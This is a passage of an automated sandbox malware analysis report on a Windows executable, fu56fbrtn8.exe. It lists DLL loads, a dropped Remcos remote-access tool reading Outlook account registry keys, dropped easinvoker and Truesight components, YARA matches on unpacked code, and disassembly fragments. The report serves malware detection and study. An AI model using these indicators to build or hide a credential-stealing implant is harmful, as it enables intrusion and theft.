                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: fu56fbrtn8.exe | Static file information: File size 1639424 > 1048576
                      Source: fu56fbrtn8.exe | Static PE information: Raw size of DATA is bigger than: 0x100000 < 0x114800
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                      Source: Binary string: easinvoker.pdbH source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1417481054.00000000150FE000.00000004.00000020.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Unpacked PE file: 0.2.fu56fbrtn8.exe.15680000.10.unpack
                      Source: Yara match | File source: 0.2.fu56fbrtn8.exe.2d1ce08.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.fu56fbrtn8.exe.2de0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.fu56fbrtn8.exe.2d3e308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.fu56fbrtn8.exe.2d3e308.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.fu56fbrtn8.exe.2cd9910.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.1789281992.0000000002D51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.1649498271.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.3821247162.0000000002DF1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.1533650563.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_1569CB50
                      Source: initial sample | Static PE information: section where entry point is pointing to: .
                      Source: Cmzcxhwn.PIF.5.dr | Static PE information: real checksum: 0x0 should be: 0x1918cf
                      Source: netutils.dll.0.dr | Static PE information: real checksum: 0x2c00d should be: 0x1f08e
                      Source: fu56fbrtn8.exe | Static PE information: real checksum: 0x0 should be: 0x1918cf
                      Source: remcos.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1918cf
                      Source: easinvoker.exe.0.dr | Static PE information: section name: .imrsiv
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: /4
                      Source: netutils.dll.0.dr | Static PE information: section name: /19
                      Source: netutils.dll.0.dr | Static PE information: section name: /31
                      Source: netutils.dll.0.dr | Static PE information: section name: /45
                      Source: netutils.dll.0.dr | Static PE information: section name: /57
                      Source: netutils.dll.0.dr | Static PE information: section name: /70
                      Source: netutils.dll.0.dr | Static PE information: section name: /81
                      Source: netutils.dll.0.dr | Static PE information: section name: /92
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_029E009D push dword ptr [esi-5D3DF0BBh]; retf 0_3_029E00B1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_029E2BAE push dword ptr [esi-5D3D056Dh]; iretd 0_3_029E2BB5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_029E23C9 push dword ptr [esi-5D3D05BBh]; iretd 0_3_029E23DD
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02B0C6F9 push cs; retf 0_3_02B0C6FE
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02B0802D push ss; retf 0_3_02B08053
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02AE57F3 push edi; iretd 0_3_02AE57F4
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02B0C120 push es; retf 0_3_02B0C12B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BA12D3 pushfd ; ret 0_3_02BA12D4
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BA5FF8 push es; retf 0_3_02BA6003
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BA65D1 push cs; retf 0_3_02BA65D6
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BA1F05 push ss; retf 0_3_02BA1F2B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156DE54D push esi; ret 0_2_156DE556
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156DB163 push esp; ret 0_2_156DB141
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156DB143 pushad ; ret 0_2_156DB151
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156D7106 push ecx; ret 0_2_156D7119
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156DB18B pushfd ; ret 0_2_156DB191
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156DB0F3 push esp; ret 0_2_156DB141
